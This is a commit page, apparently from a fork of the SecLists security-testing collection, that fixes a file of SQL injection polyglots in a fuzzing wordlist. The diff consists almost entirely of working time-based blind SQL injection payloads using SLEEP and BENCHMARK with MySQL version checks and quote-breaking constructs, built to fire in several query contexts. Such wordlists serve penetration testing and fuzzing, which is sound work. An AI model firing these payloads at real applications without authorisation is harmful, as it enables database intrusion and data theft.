idan/SecLists
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Close #69 - Fix SQLi Polyglot

Browse Source 
Source: https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/

Source: https://twitter.com/SymbianSyMoh/status/707685783801454594
This commit is contained in:
g0tmi1k
2018-03-21 16:29:03 +00:00
parent 9ae73c2ceb
commit 7b6b792312
1 changed files with 2 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
Fuzzing/Polyglots/SQLi-Polyglots.txt
View File

@@ -1,2 +1,3 @@
SLEEP(1) /* or SLEEP(1) or ‘“ or SLEEP(1) or “*/
SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/